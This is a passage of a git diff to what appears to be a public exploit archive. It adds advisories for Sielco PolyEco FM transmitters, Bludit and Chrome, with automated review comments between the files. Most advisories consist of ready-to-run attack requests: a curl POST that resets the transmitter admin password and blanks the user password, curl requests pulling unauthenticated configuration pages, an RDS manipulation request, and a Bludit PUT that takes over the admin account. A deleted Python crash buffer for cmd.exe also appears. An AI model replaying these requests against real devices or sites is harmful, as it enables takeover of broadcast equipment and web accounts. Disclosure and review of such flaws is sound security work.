+ +Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5767 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php + + +26.01.2023 + +-- + + +POST /protect/rds.htm HTTP/1.1 +Host: RADIOFM + +rds_inta=1 +rds_intb=0 +rds_pi=381 +rds_ps=ZSL +rds_rta=www.zeroscience.mk +rds_rtb +rds_rtt=0 +rds_tp=0 +rds_tp=1 +rds_ta=0 +rds_ms=0 +rds_pty=4 +rds_ptyn= +rds_ecc=00 +rds_ct=0 +rds_level=90 +rds_psd=0 +rds_psd1 +rds_pst1=0 +rds_psd5 +rds_pst5=0 +rds_psd2 +rds_pst2=0 +rds_psd6 +rds_pst6=0 +rds_psd3 +rds_pst3=0 +rds_psd7 +rds_pst7=0 +rds_psd4 +rds_pst4=0 +rds_psd8 +rds_pst8=0 +rds_di_pty=0 +rds_di_cmp=0 +rds_di_cmp=1 +rds_di_st=0 +rds_di_art=0 +rds_di_art=1 +a0=90 +a1=9 +a2=26 +a3=115 +a4=0 +a5=0 +a6=0 +a7=0 +a8=0 +a9=0 +a10=0 +a11=0 +a12=0 +a13=0 +a14=0 +a15=0 +a16=0 +a17=0 +a18=0 +a19=0 +a20=0 +a21=0 +a22=0 +a23=0 +a24=0 \ No newline at end of file diff --git a/exploits/hardware/webapps/51370.txt b/exploits/hardware/webapps/51370.txt new file mode 100644 index 000000000..5f093f6ab --- /dev/null +++ b/exploits/hardware/webapps/51370.txt 
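Review bot: The PoC `POST /protect/rds.htm HTTP/1.1` is not replayable as written: it has no `Content-Type: application/x-www-form-urlencoded` header and the body is listed one field per line instead of `&`-joined, and several keys appear twice (`rds_tp=0`/`rds_tp=1`, `rds_di_cmp`, `rds_di_art`), which reads like a form dump rather than a captured request. More importantly the request carries no `Cookie: polyeco=...`, so it is unclear whether this works unauthenticated (the endpoint sits under `/protect/`, which the companion Sielco advisories in this patch treat as the authenticated area) or only as CSRF against a logged-in operator; the description says "without performing any validity checks", and the advisory should state which. Add the header and join the body, e.g. `Content-Type: application/x-www-form-urlencoded` followed by `rds_inta=1&rds_intb=0&rds_pi=381&rds_ps=ZSL&rds_rta=www.zeroscience.mk&...`.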
@@ -0,0 +1,67 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Sielco PolyEco is affected by an information disclosure
+vulnerability due to improper access control enforcement. An
+unauthenticated remote attacker can exploit this, via a specially
+crafted request to gain access to sensitive information.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5766
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
+
+
+26.01.2023
+
+--
+
+
+$ curl -s http://RADIOFM/factory.ssi
+$ curl -s http://RADIOFM/rds.ssi
+$ curl -s http://RADIOFM/ip.ssi
+$ curl -s http://RADIOFM/alarm.ssi
+$ curl -s http://RADIOFM/i2s.ssi
+$ curl -s http://RADIOFM/time.ssi
+$ curl -s http://RADIOFM/fft.ssi
+$ curl -s http://RADIOFM/info.ssi
+$ curl -s http://RADIOFM/status.ssi
+$ curl -s http://RADIOFM/statusx.ssi
+$ curl -s http://RADIOFM/audio.ssi
+$ curl -s http://RADIOFM/smtp.ssi
+$ curl -s http://RADIOFM/rf.ssi
+$ curl -s http://RADIOFM/rfa.ssi
+$ curl -s http://RADIOFM/ping.ssi
+$ curl -s http://RADIOFM/lan.ssi
+$ curl -s http://RADIOFM/kappa.ssi
+$ curl -s http://RADIOFM/dbrt.ssi
+$ curl -s http://RADIOFM/audiom.ssi
+$ curl -s http://RADIOFM/log.ssi
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51371.txt b/exploits/hardware/webapps/51371.txt
new file mode 100644
index 000000000..77f443866
--- /dev/null
+++ b/exploits/hardware/webapps/51371.txt
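Review bot: The twenty `curl` lines say nothing about what each `.ssi` page returns, so the severity claimed in the Desc ("sensitive information") cannot be checked from the advisory: pages whose names suggest configuration (`factory.ssi`, `smtp.ssi`, `lan.ssi`) would be a very different finding from telemetry such as `fft.ssi` or `status.ssi`. One redacted sample response, or a sentence naming which endpoints expose credentials or addresses, would make the finding verifiable and let operators prioritise. `Tested on: lwIP/2.1.1` is the only hint at the cause; if the `.ssi` pages are served outside the `/protect/` path used by the other PolyEco advisories, saying so would explain why no session is needed and where an access-control fix belongs.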
@@ -0,0 +1,54 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
+## Exploit Author: LiquidWorm
+
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: The application suffers from an authentication bypass,
+account takeover/lockout and elevation of privileges vulnerability
+that can be triggered by directly calling the users object and
+effectively modifying the password of the two constants user/role
+(user/admin). This can be exploited by an unauthenticated adversary
+by issuing a single POST request to the vulnerable endpoint and
+gain unauthorized access to the affected device with administrative
+privileges.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5765
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php
+
+
+26.01.2023
+
+--
+
+
+# Change admin pwd
+$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
\ No newline at end of file
diff --git a/exploits/macos/local/51361.txt b/exploits/macos/local/51361.txt
new file mode 100644
index 000000000..c30ce70f0
--- /dev/null
+++ b/exploits/macos/local/51361.txt
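Review bot: The single PoC command is destructive and the advisory never says so: `-F "pwd_user="` submits an empty password for the user account in the same request that changes `pwd_admin`, which is presumably the "Lockout" in the title, but the text does not explain it or say whether `pwd_user` can be omitted. A sentence next to the command such as `Note: this request overwrites both account passwords; verify a recovery path before running it on a live transmitter` would stop a tester from locking the operator out of a broadcast device. The Desc phrase "the two constants user/role (user/admin)" reads as garbled; "the two fixed accounts/roles (user and admin)" seems to be the intent. No fixed firmware or vendor response is recorded here or in the sibling PolyEco advisories.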
@@ -0,0 +1,319 @@
+## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
+## Exploit Author: LiquidWorm
+
+Vendor: Google LLC
+Product web page: https://www.google.com
+Affected version: 111.0.5563.64 (Official Build) (x86_64)
+ 110.0.5481.100 (Official Build) (x86_64)
+ 108.0.5359.124 (Official Build) (x86_64)
+ 108.0.5359.98 (Official Build) (x86_64)
+Fixed version: 112.0.5615.49 (Official Build) (x86_64)
+
+Summary: Google Chrome browser is a free web browser used for
+accessing the internet and running web-based applications. The
+Google Chrome browser is based on the open source Chromium web
+browser project. Google released Chrome in 2008 and issues several
+updates a year.
+
+Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
+tabs on macOS.
+
+Commit fix:
+
+"The original cl landed many months ago, but
+chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
+is the only change that didn't revert cleanly."
+
+macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
+
+Implements accessibility hit testing for RemoteCocoa so that Hover Text
+and VoiceOver mouse mode can read the accessible objects under the
+user's pointer. Cross-process plumbing was needed because RemoteCocoa
+bridges to native controls in a separate app shim process and must
+report accessibility trees from the browser process via the
+undocumented NSAccessibilityRemoteUIElement mechanism.
+
+This CL does the following:
+
+1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
+ in the browser process. This enables the browser process to accept
+ redirected accessibilityHitTest calls to the object corresponding to
+ any NSAccessibilityRemoteUIElement returned by the original
+ accessibilityHitTest at the app shim process.
+
+2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
+ accessibilityHitTest to have a custom implementation with
+ NSAccessibilityRemoteUIElement support so that custom window
+ controls can be found. Additionally, adjusts the BrowserView bounds
+ so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
+ support view targeting) can return controls in the web app frame
+ toolbar.
+
+3. (For Web Content) Implements RenderWidgetHostViewCocoa's
+ accessibilityHitTest for instances in the app shim to return a
+ NSAccessibilityRemoteUIElement corresponding to their counterparts
+ in the browser process so that web content objects can be found.
+
+
+Tested on: macOS 12.6.1 (Monterey)
+ macOS 13.3.1 (Ventura)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5770
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
+
+
+08.12.2022
+
+--
+
+
+UI PoC:
+-------
+1. Grab a tab and detach it.
+2. Bring back the tab.
+3. Do this 2-3 times attaching / re-attaching the tab.
+4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
+5. Process crashes entirely.
+
+Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
+Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
+Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
+Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
+
+=============
+//
+// Copyright (c) Microsoft Corporation. All rights reserved.
+// + +#include + +#include +#include +#include + +__BEGIN_DECLS + // NOLINTNEXTLINE + AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *); + // NOLINTNEXTLINE + CFTypeID AXTextMarkerGetTypeID(); +__END_DECLS + +std::ostream& bold_on(std::ostream& os) +{ + if (isatty(STDOUT_FILENO)) + { + return os << "\e[1m"; + } + return os; +} + +std::ostream& bold_off(std::ostream& os) +{ + if (isatty(STDOUT_FILENO)) + { + return os << "\e[0m"; + } + return os; +} + +std::string from_cfstr(CFTypeRef cf_ref) +{ + if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID()) + { + const auto cf_str = static_cast(cf_ref); + const auto max_length = static_cast(CFStringGetMaximumSizeForEncoding( + CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1; + + auto result = std::string(max_length, '\0'); + if (CFStringGetCString(cf_str, result.data(), static_cast(max_length), kCFStringEncodingUTF8)) + { + if (const auto pos = result.find('\0'); pos != std::string::npos) + { + result.resize(pos); + } + return result; + } + } + return {}; +} + +std::string ax_element_id(AXUIElementRef value) +{ + // AX element cache - AX elements are backed by CFData + // (referring to 'remote' AX objects) and this data is + // 'stable' across 'volatile' instances of AXUIElement. + // 'hash and equality' of AX elements are based on this + // data and therefore, we can use AXUIElement objects as + // 'keys' in a dictionary with values, identifying these + // objects (uniquely). 
+ const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, + &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); + + auto ax_id = CFDictionaryGetValue(ax_elements, value); + + if (ax_id == nullptr) + { + if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault)) + { + if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid)) + { + CFDictionarySetValue(ax_elements, value, uuid_s); + + CFRelease(uuid_s); + } + CFRelease(uuid); + } + + ax_id = CFDictionaryGetValue(ax_elements, value); + } + + return from_cfstr(ax_id); +} + +template +T ax_attribute_value(AXUIElementRef e, CFStringRef name) +{ + if (e != nullptr) + { + auto ref = T{}; + if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess) + { + return ref; + } + } + return nullptr; +} + +// NOLINTNEXTLINE +void ax_traverse(AXUIElementRef elem, uint32_t depth) +{ + const auto max_depth = 10; + if (depth > max_depth) + { + return; + } + + const auto indent = [&]() + { + for (auto x = 0; x < depth; x++) + { + std::cout << " "; + } + }; + + auto wid = CGWindowID{}; + if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess) + { + wid = 0; + } + + indent(); + const auto role = ax_attribute_value(elem, kAXRoleAttribute); + + std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) << + ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off << + std::endl; + + if (const auto children = ax_attribute_value(elem, kAXChildrenAttribute)) + { + for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++) + { + const auto element = static_cast(CFArrayGetValueAtIndex(children, idx)); + ax_traverse(element, depth + 1); + } + CFRelease(children); + } +} + +int main(int argc, char* const argv[]) +{ + auto pid = 0; + + if (argc > 1) + { + if (!AXIsProcessTrusted()) + { + std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl; + exit(1); // NOLINT + } + // NOLINTNEXTLINE + pid = 
std::stoi(argv[1]); + } + else + { + std::cerr << "usage: axtester " << std::endl; + exit(1); // NOLINT + } + + if (const auto app = AXUIElementCreateApplication(pid)) + { + auto observer = AXObserverRef{}; + auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx) + { + auto myapp = (__AXUIElement*)(ctx); + auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8); + std::cout << "Hint: " << hint << std::endl; + ax_traverse(myapp, 0); + }, &observer); + + if (kAXErrorSuccess != ret) + { + std::cerr << "Fail to create observer" << std::endl; + return -1; + } + + std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl; + std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl; + std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl; + std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl; + std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl; + std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl; + std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl; + CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode); + CFRunLoopRun(); + } + + return 0; +} + +--codeaibot explains-- + +This is a C++ program that uses the Accessibility API (AX) provided +by macOS to traverse the user interface of a running application and +print out information about the accessibility elements that it finds. 
+
+The program takes a single argument, which is the process ID (PID) of
+the application to examine. If no argument is provided, the program
+displays a usage message and exits.
+
+The main() function first checks if the Terminal app has been granted
+accessibility privileges by calling the AXIsProcessTrusted() function.
+If it hasn't, the program displays an error message and exits.
+
+If the Terminal app has been granted accessibility privileges, the program
+creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
+function, passing in the PID as an argument.
+
+The ax_traverse() function is then called with the root accessibility
+element of the application as an argument. This function recursively
+traverses the accessibility tree of the application, printing out
+information about each element it encounters.
+
+The program also defines several helper functions for working with Core
+Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
+as well as some functions for printing formatted output to the console
+(bold_on() and bold_off()).
+
+-- / --
+
+As this issue is not a security issue nor results in security consequences,
+this report is not eligible for a VRP reward.
+
+++
+Thank you Amy!
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/51360.txt b/exploits/php/webapps/51360.txt
new file mode 100644
index 000000000..7cedabf2e
--- /dev/null
+++ b/exploits/php/webapps/51360.txt
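Review bot: The embedded axtester listing is not compilable as archived: every `#include` directive is empty and the usage message reads `usage: axtester ` with no argument placeholder, which suggests angle-bracketed text was stripped at some point; if that happened before the file was committed, the header names and the pid placeholder should be restored. In the observer callback, `CFStringGetCStringPtr` may return NULL and `hint` is streamed straight into `std::cout`, so the harness can crash in its own handler instead of demonstrating the Chrome hang; `if (hint) std::cout << "Hint: " << hint << std::endl;`, or using the `from_cfstr(name)` helper already defined in the file, avoids that. The advisory itself quotes Google's triage that this is not a security issue, so the `Fixed version` line under a "Fatal OOM/Crash" title should carry that caveat to keep readers from filing it as a DoS finding.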
@@ -0,0 +1,90 @@
+## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
+## Author: nu11secur1ty
+## Date: 04.11.2013
+## Vendor: https://www.bludit.com/
+## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
+## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
+## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
+
+## Description:
+The already authenticated attacker can send a normal request to change
+his password and then he can use
+the same JSON `object` and the vulnerable `API token KEY` in the same
+request to change the admin account password.
+Then he can access the admin account and he can do very malicious stuff.
+
+STATUS: HIGH Vulnerability
+
+[+]Exploit:
+```PUT
+PUT /api/users/admin HTTP/1.1
+Host: 127.0.0.1:8000
+Content-Length: 138
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-platform: "Windows"
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
+Safari/537.36
+content-type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8000
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:8000/admin/edit-user/pwned
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
+Connection: close
+
+{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
+
+```
+
+[+]Response:
+```HTTP
+HTTP/1.1 200 OK
+Host: 127.0.0.1:8000
+Date: Tue, 11 Apr 2023 08:33:51 GMT
+Connection: close
+X-Powered-By: PHP/7.4.30
+Access-Control-Allow-Origin: *
+Content-Type: application/json
+
+{"status":"0","message":"User edited.","data":{"key":"admin"}}
+```
+
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
+
+## Proof and Exploit:
+[href](https://streamable.com/w3aa4d)
+
+## Time spend:
+00:57:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/windows/dos/51348.txt b/exploits/windows/dos/51348.txt
deleted file mode 100644
index 491938dcd..000000000
--- a/exploits/windows/dos/51348.txt
+++ /dev/null
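Review bot: The header `## Date: 04.11.2013` contradicts both the captured response (`Date: Tue, 11 Apr 2023`) and the index entry in files_exploits.csv dated 2023-04-14, so it should read 2023. The Description never names the missing check: the `PUT /api/users/admin` request is authenticated as the low-privilege user `pwned` (its own `token`/`authentication` values and `BLUDIT-KEY` cookie) yet the server reports `"User edited."` for `admin`, which presumably means the user-edit handler does not compare the caller's identity or role with the `username` in the path; stating that, together with the preconditions (an existing non-admin account, whichever API component must be enabled, and what `token` and `authentication` are), would make the advisory reproducible from the text rather than from the external links. The two generic account-takeover references add nothing product-specific; a vendor issue or fix commit, if one exists, would. The signature block is pasted twice at the end.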
@@ -1,38 +0,0 @@
-# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
-# Exploit Author: Milad Karimi (Ex3ptionaL)
-# Date: 2023-03-30
-# Vendor Homepage: https://www.microsoft.com/en-us
-# Software Link: https://www.microsoft.com/en-us
-# Tested Version: N/A
-# Tested on OS: Windows 11 Pro
-
-# [ About App ]
-
-Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
-
-An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
-
-This issue affects Microsoft Windows 11 Pro.
-
-Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
-
-
-# [ POC ]
-
-# 1.Run the python script, it will create a new file "PoC.txt"
-# 2.Run Command Prompt
-# 3.Copy the content of the file "PoC.txt"
-# 4.Paste the content of dos.txt into the lin cmd.exe
-# 5.Crashed ;)
-
-#!/usr/bin/env python
-buffer = "A" * 339839907
-payload = buffer
-try:
-    f=open("PoC.txt","w")
-    print "[+] Creating %s evil payload.." %len(payload)
-    f.write(payload)
-    f.close()
-    print "[+] File created!"
-except:
-    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f788a75a3..3ff01acf6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1123,6 +1123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30380,,,,,https://www.securityfocus.com/bid/21043/info
 28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30381,,,,,https://www.securityfocus.com/bid/21043/info
 11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp,,2010-02-11,,0,OSVDB-62338,,,,,
+51362,exploits/asp/webapps/51362.txt,"InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal",2023-04-14,Zer0FauLT,webapps,asp,,2023-04-14,2023-04-14,0,,,,,,
 29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32852,,,,,https://www.securityfocus.com/bid/22052/info
 29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32853,,,,,https://www.securityfocus.com/bid/22052/info
 30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp,,2007-12-31,2014-01-15,1,CVE-2007-6671;OSVDB-39766,,,,,https://www.securityfocus.com/bid/27080/info
@@ -3863,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
 35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
 40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
+51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
 7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware,,2009-01-24,,1,,,,,,
 24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware,,2004-04-27,2013-01-13,1,CVE-2004-2626;OSVDB-5703,,,,,https://www.securityfocus.com/bid/10227/info
 38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102,2015-12-14,2015-12-14,0,,"Metasploit Framework (MSF)",,,,
@@ -4716,6 +4718,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,,2013-06-05,2016-12-05,0,OSVDB-94103,,,,,
 44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,,2018-06-12,2018-06-12,0,,,,,,https://blog.spaceduck.io/siaberry-1/
 48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,,2020-07-07,2020-07-07,0,,,,,,
+51363,exploits/hardware/webapps/51363.txt,"Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51364,exploits/hardware/webapps/51364.txt,"Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51365,exploits/hardware/webapps/51365.txt,"Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51371,exploits/hardware/webapps/51371.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51367,exploits/hardware/webapps/51367.py,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51368,exploits/hardware/webapps/51368.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51369,exploits/hardware/webapps/51369.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
+51370,exploits/hardware/webapps/51370.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
 25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware,,2013-05-13,2013-05-13,0,OSVDB-93263,,,,,https://www.vulnerability-lab.com/get_content.php?id=937
 49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-10-28,0,,,,,,
